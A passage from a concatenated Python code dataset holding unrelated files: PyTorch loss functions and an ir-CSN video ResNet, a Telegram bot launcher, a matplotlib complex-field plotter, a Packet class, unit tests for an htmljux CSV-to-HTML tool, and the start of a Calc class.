                    # For the same reason, beta_k is batch-wise, not image-wise.
                    # The original paper defines a single beta instead of beta_k; the rationale of this choice is unclear.
                    # On the other hand, here beta_k=lambda/(1+lambda)
                    mcb_loss += (ik * (1 - beta_k)).mean()  # Negative loss
                    tmp = y_true[:, i] * bce_loss[:, i]  # Positive Loss
                    mcb_loss += (tmp * beta_k).sum() / (y_true[:, i].sum() + self.epsilon)
            bce_loss = mcb_loss
        return bce_loss


register_loss('MultiLabelSoftBinaryCrossEntropy', MultiLabelSoftBinaryCrossEntropy)
class MultiDatasetCrossEntropy(nn.Module):
    """Segmentation loss over samples drawn from multiple datasets, each with
    a predicted per-pixel confusion matrix (noisy-label adaptation), plus a
    trace regularization term over the normalized confusion matrices.
    """

    def __init__(self, smooth_factor: float = 0, weighted: bool = True, mcb: bool = False,
                 hp_lambda: int = 10, alpha=None,
                 epsilon: float = 1e-5,
                 criterion='CustomCrossEntropy'):
        super(MultiDatasetCrossEntropy, self).__init__()
        self.epsilon = epsilon
        self.alpha = alpha  # weight of the confusion-matrix trace term
        self.criterion = criterion
        if self.criterion == 'CustomCrossEntropy':
            # logits=False: inputs to the inner loss are probabilities (sigmoid below).
            self.loss = MultiLabelSoftBinaryCrossEntropy(smooth_factor, weighted, mcb, hp_lambda, epsilon, logits=False,
                                                         first_class_bg=True)
        elif self.criterion == 'NLL':
            self.loss = nn.NLLLoss()

    def forward(self, y_pred: torch.Tensor, cm_predictions: list, tag: torch.Tensor, y_true: torch.Tensor):
        """
        :param y_pred: Estimation of real labels, BxCxHxW
        :param cm_predictions: List of predicted confusion matrices. Each element of the list is a tuple:
            tuple[0] = dataset id, tuple[1] = CM tensor of size BxC**2xHxW
        :param tag: Tensor of size B (dataset id of each sample)
        :param y_true: Labels associated to each image (depends on the dataset): BxCxHxW
        :return: scalar loss (data term plus alpha * trace regularization)
        """
        loss = 0.0
        regularization = 0.0
        # y_pred = torch.softmax(y_pred, 1)
        y_pred = torch.sigmoid(y_pred)
        # Derive an explicit background channel so predictions span C+1 classes.
        y_background = torch.clamp(1 - y_pred.max(1, keepdim=True).values, 0, 1)
        y_pred = torch.cat([y_background, y_pred], 1)
        # NOTE(review): '~' applies AFTER .long() here, i.e. bitwise NOT of a
        # 0/1 long tensor (giving -1/-2) rather than logical negation — confirm
        # this is intended; (~torch.any(...)).long() would give a 0/1 mask.
        y_bg_true = ~torch.any(y_true, 1, keepdim=True).long()
        y_true = torch.cat([y_bg_true, y_true], 1)
        if self.criterion == 'NLL':
            # Collapse one-hot multi-label targets to class indices (0 = background).
            max_arg = torch.max(y_true, 1, keepdim=False)
            gt = max_arg.indices + 1
            gt[max_arg.values == 0] = 0
            y_true = gt
        for d_id, cm in cm_predictions:
            # Process only the samples belonging to dataset d_id.
            y_true_did = y_true[tag == d_id]
            y_pred_did = y_pred[tag == d_id]
            b, c, h, w = y_pred_did.shape
            # Reshape so each pixel's class vector can be multiplied by its own
            # c x c confusion matrix: noisy_pred = CM @ clean_pred.
            y_pred_did = y_pred_did.view(b, c, h * w).permute(0, 2, 1).reshape(b * h * w, c, 1)
            cm = cm.view(b, c ** 2, h * w).permute(0, 2, 1)
            cm = cm.reshape(b * h * w, c ** 2).view(b * h * w, c, c)
            # Normalize so each CM column sums (approximately) to 1.
            cm = cm / (cm.sum(1, keepdim=True) + self.epsilon)
            # cm = torch.sigmoid(cm)
            y_pred_n = torch.bmm(cm, y_pred_did).view(b * h * w, c)
            y_pred_n = y_pred_n.view(b, h * w, c).permute(0, 2, 1).reshape(b, c, h, w)
            loss += self.loss(torch.clamp(y_pred_n, self.epsilon, 1), y_true_did)
            # Trace regularization over the normalized confusion matrices.
            regularization += torch.trace(torch.sum(cm, dim=0)) / (b * h * w)
        return loss + self.alpha * regularization


register_loss('MultiDatasetCrossEntropy', MultiDatasetCrossEntropy)
class MultiLabelToCrossEntropyLoss(nn.Module):
    """Adapter that converts one-hot multi-label targets into class indices
    for a standard cross-entropy criterion.

    Index 0 acts as an implicit background class: pixels with no active
    label map to 0, all others to ``argmax + 1``.
    """

    def __init__(self, from_logits=False):
        super().__init__()
        # CrossEntropyLoss expects raw logits; NLLLoss expects log-probabilities.
        self.loss = nn.CrossEntropyLoss() if from_logits else nn.NLLLoss()

    def forward(self, y_pred, y_true):
        values, indices = torch.max(y_true, 1)
        targets = torch.where(values == 0, torch.zeros_like(indices), indices + 1)
        return self.loss(y_pred, targets)
| StarcoderdataPython |
1714753 | """
Video Classification with Channel-Separated Convolutional Networks
ICCV 2019, https://arxiv.org/abs/1904.02811
Large-scale weakly-supervised pre-training for video action recognition
CVPR 2019, https://arxiv.org/abs/1905.00561
"""
# pylint: disable=missing-function-docstring, missing-class-docstring
import torch
import torch.nn as nn
__all__ = ['ResNet_IRCSNv2', 'ircsn_v2_resnet152_f32s2_kinetics400']
eps = 1e-3
bn_mmt = 0.1
class Affine(nn.Module):
    """Frozen per-channel affine transform: ``y = x * weight + bias``.

    Drop-in stand-in for a normalization layer whose statistics have been
    folded into fixed scale/shift parameters; both parameters have
    gradients disabled.
    """

    def __init__(self, feature_in):
        super().__init__()
        shape = (feature_in, 1, 1, 1)
        self.weight = nn.Parameter(torch.randn(shape), requires_grad=False)
        self.bias = nn.Parameter(torch.randn(shape), requires_grad=False)

    def forward(self, x):
        return x * self.weight + self.bias
class Bottleneck_IRCSNv2(nn.Module):
    """Interaction-reduced channel-separated bottleneck block (ir-CSN).

    The 3x3x3 convolution is depthwise (groups=planes), sandwiched between
    1x1x1 projections; with ``use_affine`` the normalization layers are
    frozen Affine scale/shift layers instead of BatchNorm.
    """

    def __init__(self, in_planes, planes, stride=1, temporal_stride=1,
                 down_sample=None, expansion=2, temporal_kernel=3, use_affine=True):
        super(Bottleneck_IRCSNv2, self).__init__()
        self.expansion = expansion
        # 1x1x1 channel reduction.
        self.conv1 = nn.Conv3d(in_planes, planes, kernel_size=(1, 1, 1), bias=False, stride=(1, 1, 1))
        if use_affine:
            self.bn1 = Affine(planes)
        else:
            self.bn1 = nn.BatchNorm3d(planes, track_running_stats=True, eps=eps, momentum=bn_mmt)
        # Depthwise (channel-separated) 3x3x3 spatio-temporal convolution.
        self.conv3 = nn.Conv3d(planes, planes, kernel_size=(3, 3, 3), bias=False,
                               stride=(temporal_stride, stride, stride),
                               padding=((temporal_kernel - 1) // 2, 1, 1),
                               groups=planes)
        if use_affine:
            self.bn3 = Affine(planes)
        else:
            self.bn3 = nn.BatchNorm3d(planes, track_running_stats=True, eps=eps, momentum=bn_mmt)
        # 1x1x1 expansion back to planes * expansion channels.
        self.conv4 = nn.Conv3d(
            planes, planes * self.expansion, kernel_size=1, bias=False)
        if use_affine:
            self.bn4 = Affine(planes * self.expansion)
        else:
            self.bn4 = nn.BatchNorm3d(planes * self.expansion, track_running_stats=True, eps=eps, momentum=bn_mmt)
        self.relu = nn.ReLU(inplace=True)
        self.down_sample = down_sample
        self.stride = stride

    def forward(self, x):
        residual = x
        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu(out)
        out = self.conv3(out)
        out = self.bn3(out)
        out = self.relu(out)
        out = self.conv4(out)
        out = self.bn4(out)
        if self.down_sample is not None:
            # Project the residual when stride or channel width changes.
            residual = self.down_sample(x)
        out += residual
        out = self.relu(out)
        return out
class ResNet_IRCSNv2(nn.Module):
    """Interaction-reduced channel-separated 3D ResNet (ir-CSN v2) backbone."""

    def __init__(self,
                 block,
                 block_nums,
                 num_classes=400,
                 feat_ext=False,
                 use_affine=True):
        # block: residual block class (Bottleneck_IRCSNv2).
        # block_nums: blocks per stage, e.g. [3, 8, 36, 3] for ResNet-152.
        # feat_ext: if True, forward() returns pooled features, not logits.
        # use_affine: replace BatchNorm with frozen Affine layers.
        self.use_affine = use_affine
        self.in_planes = 64
        self.num_classes = num_classes
        self.feat_ext = feat_ext
        super(ResNet_IRCSNv2, self).__init__()
        # Stem: 3x7x7 convolution with spatial stride 2.
        self.conv1 = nn.Conv3d(
            3,
            64,
            kernel_size=(3, 7, 7),
            stride=(1, 2, 2),
            padding=(1, 3, 3),
            bias=False)
        if use_affine:
            self.bn1 = Affine(64)
        else:
            self.bn1 = nn.BatchNorm3d(64, track_running_stats=True, eps=eps, momentum=bn_mmt)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool3d(kernel_size=(1, 3, 3), stride=(1, 2, 2), padding=(0, 1, 1))
        # Four residual stages; stages 2-4 also halve the temporal dimension.
        self.layer1 = self._make_layer(block, in_planes=64, planes=64, blocks=block_nums[0],
                                       stride=1, expansion=4)
        self.layer2 = self._make_layer(block, in_planes=256, planes=128, blocks=block_nums[1],
                                       stride=2, temporal_stride=2, expansion=4)
        self.layer3 = self._make_layer(block, in_planes=512, planes=256, blocks=block_nums[2],
                                       stride=2, temporal_stride=2, expansion=4)
        self.layer4 = self._make_layer(block, in_planes=1024, planes=512, blocks=block_nums[3],
                                       stride=2, temporal_stride=2, expansion=4)
        self.avgpool = nn.AdaptiveAvgPool3d(output_size=(1, 1, 1))
        self.out_fc = nn.Linear(in_features=2048, out_features=num_classes)

    def _make_layer(self,
                    block,
                    in_planes,
                    planes,
                    blocks,
                    stride=1,
                    temporal_stride=1,
                    expansion=4):
        # Projection shortcut for the first (striding) block of the stage.
        if self.use_affine:
            down_bn = Affine(planes * expansion)
        else:
            down_bn = nn.BatchNorm3d(planes * expansion, track_running_stats=True, eps=eps, momentum=bn_mmt)
        down_sample = nn.Sequential(
            nn.Conv3d(
                in_planes,
                planes * expansion,
                kernel_size=1,
                stride=(temporal_stride, stride, stride),
                bias=False), down_bn)
        layers = []
        layers.append(
            block(in_planes, planes, stride, temporal_stride, down_sample, expansion,
                  temporal_kernel=3, use_affine=self.use_affine))
        # Remaining blocks keep the resolution and reuse the expanded width.
        for _ in range(1, blocks):
            layers.append(block(planes * expansion, planes, expansion=expansion,
                                temporal_kernel=3, use_affine=self.use_affine))
        return nn.Sequential(*layers)

    def forward(self, x):
        bs, _, _, _, _ = x.size()
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.avgpool(x)
        x = x.view(bs, -1)
        if self.feat_ext:
            # Feature-extraction mode: return the 2048-d pooled features.
            return x
        logits = self.out_fc(x)
        return logits
def ircsn_v2_resnet152_f32s2_kinetics400(cfg):
    """Build the IR-CSN-v2 ResNet-152 model (32-frame, stride-2) for
    Kinetics-400, optionally loading pretrained weights per the config."""
    model = ResNet_IRCSNv2(
        Bottleneck_IRCSNv2,
        num_classes=cfg.CONFIG.DATA.NUM_CLASSES,
        block_nums=[3, 8, 36, 3],
        feat_ext=cfg.CONFIG.INFERENCE.FEAT,
        use_affine=cfg.CONFIG.MODEL.USE_AFFINE)
    if cfg.CONFIG.MODEL.PRETRAINED:
        from ..model_store import get_model_file
        weights_path = get_model_file('ircsn_v2_resnet152_f32s2_kinetics400',
                                      tag=cfg.CONFIG.MODEL.PRETRAINED)
        model.load_state_dict(torch.load(weights_path))
    return model
| StarcoderdataPython |
1793401 | import config
import logging
import sys
from telegram.ext import Updater
updater = None
logger = logging.getLogger('bot')
# Choose the bot runner implementation at import time based on config.MODE.
if config.MODE == "dev":
    def run(updater):
        # Development: long-polling; no public HTTPS endpoint required.
        updater.start_polling()
elif config.MODE == "prod":
    def run(updater):
        # Production: serve a webhook and register it with Telegram so
        # updates are pushed to the Heroku app URL.
        updater.start_webhook(listen="0.0.0.0", port=config.PORT, url_path=config.TOKEN)
        updater.bot.set_webhook("https://{}.herokuapp.com/{}".format(config.HEROKU_APP_NAME, config.TOKEN))
else:
    # Unknown mode is a configuration error; abort at import.
    logger.error("No MODE specified!")
    sys.exit(1)
def send_message(chat_id, text, reply_markup=None):
    """Send *text* to the given chat via the module-level updater's bot.

    Requires start() to have been called first so ``updater`` is initialized.
    The original body called an undefined ``sendMessage`` (NameError) and
    concatenated ``chat_id`` into the log string, which raised TypeError for
    integer chat ids.
    """
    # Lazy %-style logging also handles non-str chat ids safely.
    logger.info('send msg to %s', chat_id)
    updater.bot.send_message(chat_id=chat_id, text=text, reply_markup=reply_markup)
def add_handlers(handlers):
    """Register a single handler, or each handler in a list, on the dispatcher."""
    if type(handlers) == list:
        logger.debug('add handlers')
        for single in handlers:
            updater.dispatcher.add_handler(single)
    else:
        logger.debug('add handler')
        updater.dispatcher.add_handler(handlers)
def add_error_handlers(handlers):
    """Register a single error handler, or each handler in a list/dict of them.

    Fix: the original only iterated when given a ``dict`` (its sibling
    add_handlers checks for ``list``), so a list of error handlers was
    registered as one broken handler object. Lists and dicts now both
    iterate; dict behavior is unchanged for backward compatibility.
    """
    if type(handlers) not in (list, dict):
        logger.debug('add error handler')
        updater.dispatcher.add_error_handler(handlers)
        return
    logger.debug('add error handlers')
    for handler in handlers:
        updater.dispatcher.add_error_handler(handler)
def start():
    """Create the global Updater from config and launch the bot via run()."""
    global updater
    logger.info("Starting bot")
    # Only dev mode passes proxy/request settings through to the Updater.
    kwargs = {'use_context': True}
    if config.MODE == 'dev':
        kwargs['request_kwargs'] = config.REQUEST_KWARGS
    updater = Updater(config.TOKEN, **kwargs)
    run(updater)
| StarcoderdataPython |
3230863 | import matplotlib as mpl
import numpy as np
from polaris2.geomvis import utilmpl
from matplotlib.transforms import Bbox
# Model R2toC2 in the most general case
class xy:
    """Two-panel visualization of a complex-valued 2-D field (R^2 -> C^2).

    Renders the two complex output channels of ``data`` as top/bottom color
    images plus a shared complex color wheel with a magnitude scale bar.
    """
    def __init__(self, data, circle=False, title='', xlabel='', toplabel='',
                 bottomlabel='', colormax=None, fov=1, plotfov=1):
        # [idimx, indimy, {outxcomplex, outycomplex}]
        # For example: 1000x1000x2 array with complex entries
        self.data = data
        self.circle = circle
        self.title = title
        self.xlabel = xlabel
        self.toplabel = toplabel
        self.bottomlabel = bottomlabel
        # colormax: magnitude mapped to full color saturation; None -> auto.
        self.colormax = colormax
        self.fov = fov
        # NOTE(review): plot() calls set_xlim(self.plotfov) and indexes
        # self.plotfov[0], so a sequence (min, max) seems expected despite the
        # scalar default of 1 — confirm expected type with callers.
        self.plotfov = plotfov
    def plot(self, f, fc, ss):
        """Draw the figure into matplotlib figure *f* within fraction box *fc*.

        ``fc`` is (x, y, width, height) in figure fractions; ``ss`` is unused
        here (accepted for interface compatibility with sibling geomvis views).
        """
        # Use for placing the title
        axs = utilmpl.plot_template(f, fc, title=self.title, scale_bar=False)
        axs[0].axis('off')
        axs[1].axis('off')
        # Custom placement of axes
        fx, fy, fw, fh = fc
        # Set precise positions of axes
        w = 0.375*fw
        h = 0.375*fh
        # Center coordinates
        cx = fx + 0.425*fw
        cy = fy + 0.5*fh
        # Make three axes: bottom image, top image, and the color wheel.
        axb = f.add_axes(Bbox([[cx-w,cy-h],[cx,cy]]))
        axt = f.add_axes(Bbox([[cx-w,cy],[cx,cy+h]]))
        axc = f.add_axes(Bbox([[cx+1*w/4,cy-h/2],[cx+5*w/4,cy+h/2]]))
        for ax in [axb, axt, axc]:
            ax.tick_params(axis='both', which='both', bottom=False, left=False, labelbottom=False, labelleft=False)
        # Scale bar and labels
        scale_shift = 0.05*fh
        axs[0].annotate('', xy=(cx-w,cy-h-scale_shift), xytext=(cx, cy-h-scale_shift), xycoords='figure fraction', textcoords='figure fraction', va='center', arrowprops=dict(arrowstyle="|-|, widthA=0.5, widthB=0.5", shrinkA=0, shrinkB = 0, lw=.75))
        axs[0].annotate(self.xlabel, xy=(1,1), xytext=(cx-w/2,cy-h-0.1*fh), textcoords='figure fraction', ha='center', va='center', rotation=0)
        axs[0].annotate(self.toplabel, xy=(1,1), xytext=(cx+w/8,cy+h/2), textcoords='figure fraction', ha='center', va='center', rotation=0)
        axs[0].annotate(self.bottomlabel, xy=(1,1), xytext=(cx+w/8,cy-h/2), textcoords='figure fraction', ha='center', va='center', rotation=0)
        # For labelling color scale; auto-scale to the data's max magnitude.
        if self.colormax is None:
            self.colormax = np.max(np.abs(self.data))
        # Color scale axis: unit disk colored by complex value (hue = phase).
        x = np.linspace(-1, 1, 100)
        y = np.linspace(-1, 1, 100)
        xx, yy = np.meshgrid(x, y)
        im = axc.imshow(utilmpl.c2rgb(xx + 1j*yy), interpolation='bicubic', extent=[-1,1,-1,1], origin='lower')
        axc.axis('off')
        # Clip the wheel image to a circle and outline it.
        patch = mpl.patches.Circle((0,0), radius=1, linewidth=0.5, facecolor='none',
                                   edgecolor='k', transform=axc.transData, clip_on=False)
        im.set_clip_path(patch)
        axc.add_patch(patch)
        axc.plot([-1,1],[0,0],':k', lw=0.5)
        axc.plot([0,0],[-1,1],':k', lw=0.5)
        axc.annotate('Im', xy=(1,1), xytext=(0.5,1.1), textcoords='axes fraction', ha='center', va='center', rotation=0)
        axc.annotate('Re', xy=(1,1), xytext=(1.1,0.5), textcoords='axes fraction', ha='center', va='center', rotation=0)
        axc.annotate('', xy=(0.5,-0.15), xytext=(1, -0.15), xycoords='axes fraction', textcoords='axes fraction', va='center', arrowprops=dict(arrowstyle="|-|, widthA=0.5, widthB=0.5", shrinkA=0, shrinkB = 0, lw=.75))
        axc.annotate('{:.2g}'.format(self.colormax), xy=(0,0), xytext=(0.75, -0.25), textcoords='axes fraction', ha='center', va='center', rotation=0)
        # Plot the two complex channels: index 0 on top, index 1 on bottom.
        for i, ax in enumerate([axt, axb]):
            ax.set_xlim(self.plotfov)
            ax.set_ylim(self.plotfov)
            image = utilmpl.c2rgb(self.data[:,:,i], rmax=self.colormax)
            im = ax.imshow(image.swapaxes(0,1),
                           interpolation='nearest', extent=2*self.fov, origin='lower')
            if self.circle:
                # Optionally clip each image to a circular field of view.
                ax.axis('off')
                patch = mpl.patches.Circle((0,0), radius=self.plotfov[0], linewidth=0.5, facecolor='none',
                                           edgecolor='k', transform=ax.transData, clip_on=False)
                im.set_clip_path(patch)
                ax.add_patch(patch)
| StarcoderdataPython |
3367288 | # from ..RoutesTable.routesTable import RoutesTable
from ..Status.status import QueryCode
class Packet(object):
    """Message envelope pairing a header ({'codeType': ...}) with a body
    ({'value': ...}); malformed constructor arguments fall back to safe
    defaults (Unknown code type, None value)."""

    def __init__(self, *args):
        # Validate optional positional (header_dict, body_dict) arguments.
        header_ok = len(args) >= 1 and isinstance(args[0], dict) and 'codeType' in args[0]
        self.__header = args[0] if header_ok else {'codeType': QueryCode.Unknown.value}
        body_ok = len(args) >= 2 and isinstance(args[1], dict) and 'value' in args[1]
        self.__body = args[1] if body_ok else {"value": None}

    def setBody(self, data):
        self.__body = data

    def setHeader(self, codeType):
        self.__header['codeType'] = codeType

    def toSerializableDict(self):
        """Return a plain dict suitable for JSON serialization."""
        return {"header": self.__header, "body": self.__body}

    def getHeader(self):
        # Shallow copy so callers cannot mutate internal state.
        return self.__header.copy()

    def getBody(self):
        return self.__body.copy()
# def jsonParse(self, obj):
# return Packet(obj.header, obj.body)
# Module is import-only; no standalone CLI behavior.
if __name__ == '__main__':
    pass
| StarcoderdataPython |
3265659 | <filename>tests/test_htmljux.py
import io
import re
import jinja2
import os.path
import logging
import operator
import tempfile
from argparse import Namespace
from unittest import TestCase
from _common import redaction
from shelltools import htmljux
from operator import itemgetter
_log = logging.getLogger(__name__)
def make_transform(**kwargs):
    """Build a cell-value transform from keyword overrides merged over the
    default argparse-style options."""
    options = dict(image_root=None, scheme='file', remove_prefix=None, remove_suffix=None)
    options.update(kwargs)
    return htmljux.make_cell_value_transform(Namespace(**options))
class MakeCellValueTransformTest(TestCase):
    """Tests for htmljux.make_cell_value_transform URL construction."""
    def test_urlencode(self):
        # Unsafe path characters must be percent-encoded in the file:// URL.
        unsafe_path = 'foo/bar:baz~gaw.xyz'
        t = make_transform(image_root='/x/y')
        actual = t(unsafe_path).url
        try:
            self.assertEqual("file:///x/y/foo/bar%3Abaz%7Egaw.xyz", actual)
        except AssertionError:
            # Tilde quoting differs across Python/urllib versions — accept both.
            self.assertEqual("file:///x/y/foo/bar%3Abaz~gaw.xyz", actual)
    def test_scheme_http(self):
        cell_value = 'example.com/foo.bar'
        t = make_transform(scheme='http')
        actual = t(cell_value)
        self.assertEqual("http://example.com/foo.bar", actual.url)
        self.assertEqual("foo.bar", actual.title)
class PerformTest(TestCase):
    """End-to-end tests of htmljux.perform: CSV in, HTML page out."""
    def test_perform(self):
        csv_text = """\
1,/foo/bar.jpg,/baz/g:url-unsafe:aw.jpg
2,rel/path/c.jpg,/abs/path/d.gif
"""
        buffer = io.StringIO()
        transform = make_transform(image_root='/x/y')
        extractor = htmljux.Extractor(0, None, None, transform)
        htmljux.perform(io.StringIO(csv_text), extractor, ofile=buffer)
        html = buffer.getvalue()
        _log.debug(html)
        # Normalize empty output to None so assertIsNotNone fails on "".
        html = html or None
        self.assertIsNotNone(html)
        self.assertTrue('file:///baz/g%3Aurl-unsafe%3Aaw.jpg' in html, "URL not found in html")
    def test_perform_tab(self):
        # Same flow with a tab delimiter; captions/paths may contain commas.
        csv_text = """\
1\t/foo/bar.jpg\t/baz/g:url-unsafe:aw.jpg
caption,with,commas\trel/path/c.jpg\t/abs/pa,t,h/d.gif
"""
        buffer = io.StringIO()
        transform = make_transform(image_root='/x/y')
        extractor = htmljux.Extractor(0, None, {'delimiter': "\t"}, transform)
        htmljux.perform(io.StringIO(csv_text), extractor, ofile=buffer)
        html = buffer.getvalue()
        _log.debug(html)
        html = html or None
        self.assertIsNotNone(html)
        self.assertTrue('/abs/pa%2Ct%2Ch/d.gif' in html, "URL not found in html")
        self.assertTrue('>d.gif<' in html, "title not found in html")
        self.assertTrue('caption,with,commas' in html, "caption not found in html")
class ModuleTest(TestCase):
    """Tests of the htmljux.main CLI entry point."""
    def test_main(self):
        # Malformed --images spec ('a' is not an index) must exit 1 with output
        # on stderr.
        stderr = io.StringIO()
        exit_code = htmljux.main(['--images', '3,a,5'], stderr=stderr)
        self.assertEqual(1, exit_code)
        content = stderr.getvalue()
        self.assertTrue(content or False)
    def test_main_print_template(self):
        stdout = io.StringIO()
        exit_code = htmljux.main(['--print-template'], stdout=stdout)
        self.assertEqual(0, exit_code)
        content = stdout.getvalue()
        self.assertEqual(htmljux.DEFAULT_TEMPLATE, content)
    def test_lots_of_options(self):
        # Smoke test combining caption/image columns, skip, suffix removal,
        # redaction patterns, limit and numeric sorting on a temp CSV file.
        with tempfile.TemporaryDirectory() as tmpdir:
            csv_file = os.path.join(tmpdir, "input.csv")
            with open(csv_file, 'w') as ofile:
                ofile.write("""\
A,B,C,D,E,F,G,H,I
1,2,ab,cd,ef.xyz,gh,ij,kl.xyz
1,5,mn,op,qr.xyz,st,uv,wx.xyz
2,2,ab,cd,ef.xyz,gh,ij,kl.xyz
3,5,mn,op,qr.xyz,st,uv,wx.xyz
4,2,ab,cd,ef.xyz,gh,yolo,kl.xyz
5,5,mn,op,qr.xyz,st,uv,wx.xyz
1,2,ab,cd,ef.xyz,gh,ij,kl.xyz
3,5,mn,op,yolo.xyz,st,uv,wx.xyz
6,2,ab,cd,ef.xyz,gh,ij,kl.xyz
1,5,mn,op,qr.xyz,st,uv,wx.xyz
""")
            redactions_file = os.path.join(tmpdir, "redactions.txt")
            with open(redactions_file, 'w') as ofile:
                print("yolo", file=ofile)
            argl = ["--caption", "0", "--images", "4,7", "--skip", "1",
                    "--image-root", "/path/to/images",
                    "--remove-suffix", '.xyz', "--redact-patterns", redactions_file,
                    "--limit", "5", "--sort=-numeric", csv_file]
            buffer = io.StringIO()
            exit_code = htmljux.main(argl, stdout=buffer)
            html = buffer.getvalue()
            _log.debug("\n\n%s\n\n", html)
            self.assertIsNotNone(html)
            self.assertEqual(0, exit_code)
class RowFiltersTest(TestCase):
    """Tests of the row pre/post filter factories (skip, redact, limit)."""
    def setUp(self):
        self.all_rows = [
            ['3', 'abc', 'def'],
            ['1', '234', 'xyz'],
            ['0', 'ert', '41231'],
            ['8'],
            [''],
            ['x', 'y'],
            ['oxo', '123', 'yuio'],
        ]
    def _filter_rows(self, predicate, rows=None):
        # Predicates operate on (index, row) pairs; return the surviving rows.
        if rows is None:
            rows = self.all_rows
        return list(map(itemgetter(1), filter(predicate, enumerate(rows))))
    def test_make_row_pre_filter_redactor(self):
        # Rows matching any redaction pattern are dropped; survivors 0,1,4,5.
        redactor = redaction.build_filter_from_patterns([re.compile(r'123'), re.compile('^8$'), re.compile('3,abc')])
        predicate = htmljux.make_row_pre_filter(None, redactor)
        expected = [self.all_rows[i] for i in (0, 1, 4, 5)]
        actual = self._filter_rows(predicate)
        self.assertListEqual(expected, actual)
    def test_make_row_filters_slice(self):
        original_rows = list(self.all_rows)
        n = len(original_rows)
        test_cases = [
            # skip, offset, indexes of expected rows
            (None, None, range(n)),
            (None, 3, range(3)),
            (None, 0, []),
            (None, 1000, range(n)),
            (4, None, range(4, n)),
            (4, 1000, range(4, n)),
            (2, 3, range(2, 5)),
        ]
        for skip, limit, indexes in test_cases:
            with self.subTest():
                rows = list(self.all_rows)
                expected = [original_rows[i] for i in indexes]
                pre_predicate = htmljux.make_row_pre_filter(skip, None)
                post_predicate = htmljux.make_row_post_filter(limit)
                rows = self._filter_rows(pre_predicate, rows)
                rows = self._filter_rows(post_predicate, rows)
                self.assertListEqual(expected, rows)
    def test_make_row_predicate_redactor_and_limit(self):
        # Redact rows containing 'x' (drops row 1, 'xyz'), then cap at 2 rows.
        redactor = redaction.build_filter_from_patterns([re.compile(r'x')])
        pre_predicate = htmljux.make_row_pre_filter(None, redactor)
        post_predicate = htmljux.make_row_post_filter(2)
        expected = [self.all_rows[i] for i in (0, 2)]
        rows = self.all_rows[:4]
        rows = self._filter_rows(pre_predicate, rows)
        rows = self._filter_rows(post_predicate, rows)
        self.assertListEqual(expected, rows)
class MakeSortKeyTest(TestCase):
    """Tests of htmljux.make_sort_key sort-key-definition parsing."""
    def test_blah(self):
        # Sanity check: numeric sort differs from lexicographic on '10'.
        items = [('10',), ('1',), ('5',)]
        sorted_items = sorted(items, key=lambda x: int(x[0]))
        self.assertEqual([('1',), ('5',), ('10',)], sorted_items)
    def test_make_sort_key(self):
        items = ['10', '1', '5']
        test_cases = [
            # sort_key_def, caption_column, expected
            (None, None, ['1', '10', '5']),
            (None, 0, ['1', '10', '5']),
            ('lex', 0, ['1', '10', '5']),
            ('lexicographical', 0, ['1', '10', '5']),
            ('numeric', 0, ['1', '5', '10']),
            ('lex:0', None, ['1', '10', '5']),
            ('-lex:0', None, reversed(['1', '10', '5'])),
            ('lexicographical:0', None, ['1', '10', '5']),
            ('numeric:0', None, ['1', '5', '10']),
            ('-numeric:0', None, ['10', '5', '1']),
        ]
        # Wrap bare values as 1-tuples to mimic CSV rows.
        to_rows = lambda items_: list(map(lambda x: tuple([x]), items_))
        for sort_key_def, caption_column, expected in test_cases:
            with self.subTest():
                rows = to_rows(items)
                sort_key, reverse = htmljux.make_sort_key(sort_key_def, caption_column) or (None, False)
                sorted_items = sorted(rows, key=sort_key, reverse=reverse)
                expected = to_rows(expected)
                self.assertListEqual(expected, sorted_items)
class ExtractorTest(TestCase):
    """Tests of Extractor._enumerate_rows sorting and filtering."""
    def test__enumerate_rows_sort_numeric(self):
        csv_text = """\
10,a,b
1,x,y
5,j,k
"""
        sort_key = htmljux.make_sort_key("numeric:0", None)
        # _enumerate_rows yields (index, row); keep only the rows.
        sorted_rows = list(map(operator.itemgetter(1), htmljux.Extractor()._enumerate_rows(io.StringIO(csv_text), None, sort_key, None)))
        self.assertListEqual([['1', 'x', 'y'], ['5', 'j', 'k'], ['10', 'a', 'b']], sorted_rows)
    def test__enumerate_rows_sort_and_limit(self):
        csv_text = """\
10,a,b
1,x,y
5,j,k
"""
        # Descending numeric sort, then keep only the first two rows.
        sort_key = htmljux.make_sort_key("-numeric:0", None)
        pre_predicate = htmljux.make_row_pre_filter(0, None)
        post_predicate = htmljux.make_row_post_filter(2)
        sorted_rows = list(
            map(operator.itemgetter(1), htmljux.Extractor()._enumerate_rows(io.StringIO(csv_text), pre_predicate, sort_key, post_predicate)))
        self.assertListEqual([['10', 'a', 'b'], ['5', 'j', 'k']], sorted_rows)
class RendererTest(TestCase):
    """Tests of htmljux.Renderer: rendering a page model with/without CSS.

    Fix: dataset-contamination tokens fused onto the final line made the
    class a syntax error; the code is otherwise unchanged.
    """
    def test_render_css(self):
        self.do_render(css="""
/* some unique text */
img {
    max-width: 400px;
}
""")
    def test_render_nocss(self):
        self.do_render(css=None)
    def do_render(self, css):
        """Render one row with two images; if css was given, assert it was
        embedded verbatim in the output HTML."""
        env = jinja2.Environment(
            autoescape=jinja2.select_autoescape(['html', 'xml'])
        )
        template = env.from_string(htmljux.DEFAULT_TEMPLATE)
        renderer = htmljux.Renderer(template, css)
        rows = [
            htmljux.Row('hello', [htmljux.Image('file:///tmp/foo.jpg', 'foo'), htmljux.Image('file:///tmp/bar.jpg', 'bar')])
        ]
        page_model = htmljux.PageModel(rows)
        html = renderer.render(page_model)
        if css:
            self.assertIn(css, html)
3214744 | from functools import reduce
from typing import Optional, Iterable
class Calc:
    """Small arithmetic helper, optionally wired to an external connection.

    If ``ext_obj`` is provided it must expose ``connect()``; it is connected
    eagerly and stored on the instance.
    """

    def __init__(self, ext_obj=None):
        if ext_obj:
            self.external_object = ext_obj
            self.external_object.connect()

    def add(self, *args):
        """Return the sum of all positional arguments (0 for no arguments)."""
        return sum(args)

    def sub(self, a, b):
        """Return ``a - b``."""
        return a - b

    def mul(self, *args):
        """Return the product of the arguments.

        Raises:
            ValueError: if any argument is falsy (e.g. 0) — legacy contract
                preserved from the original implementation.
        """
        if not all(args):
            raise ValueError
        return reduce(lambda x, y: x * y, args)

    def div(self, a, b):
        """Return ``a / b``, or the string ``'inf'`` when b == 0.
